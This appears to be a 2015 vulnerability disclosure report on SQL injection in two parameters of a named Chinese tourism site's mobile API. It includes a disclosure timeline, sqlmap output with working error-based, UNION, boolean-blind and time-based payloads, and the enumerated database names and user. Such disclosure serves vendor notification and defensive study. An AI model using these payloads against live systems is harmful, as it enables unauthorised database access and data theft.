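2015-10-08: Details reported to the vendor; awaiting vendor response
2015-10-09: Vendor confirmed; details disclosed to the vendor only
2015-10-19: Details disclosed to core white hats and experts in related fields
2015-10-29: Details disclosed to regular white hats
2015-11-08: Details disclosed to trainee white hats
2015-11-23: Details disclosed to the public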
...
A site belonging to Dazhong Net (大众网):
http://m.zyql.cn/?m=android/scenic.scenicTypelist&scenicType=1
http://m.zyql.cn/?m=android/scenic.scenicZb&cityId=
sqlmap identified the following injection points with a total of 205 HTTP(s) requests:
---
Place: GET
Parameter: scenicType
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=android/scenic.scenicTypelist&scenicType=1' AND (SELECT 5522 FROM(SELECT COUNT(*),CONCAT(0x3a6572693a,(SELECT (CASE WHEN (5522=5522) THEN 1 ELSE 0 END)),0x3a6772783a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UYtf'='UYtf
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 39 columns
    Payload: m=android/scenic.scenicTypelist&scenicType=1' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6572693a,0x6d496b7673635664784c,0x3a6772783a), NULL#
    Vector: LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, [QUERY], NULL#
---

sqlmap identified the following injection points with a total of 215 HTTP(s) requests:
---
Place: GET
Parameter: cityId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=android/scenic.scenicZb&cityId=' AND 6041=6041 AND 'HKty'='HKty
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=android/scenic.scenicZb&cityId=' AND (SELECT 2607 FROM(SELECT COUNT(*),CONCAT(0x3a7678613a,(SELECT (CASE WHEN (2607=2607) THEN 1 ELSE 0 END)),0x3a6468643a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'egWz'='egWz
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=android/scenic.scenicZb&cityId=' AND SLEEP(5) AND 'SIEO'='SIEO
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---

available databases [2]:
[*] information_schema
[*] zhouyouqilu

Database: zhouyouqilu

database management system users [1]:
[*] 'zhouyouqilu'@'%'
ok
···
Fix it.
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2015-10-09 12:42
The boss hasn't come in, and the developers have gone to Finance.
None yet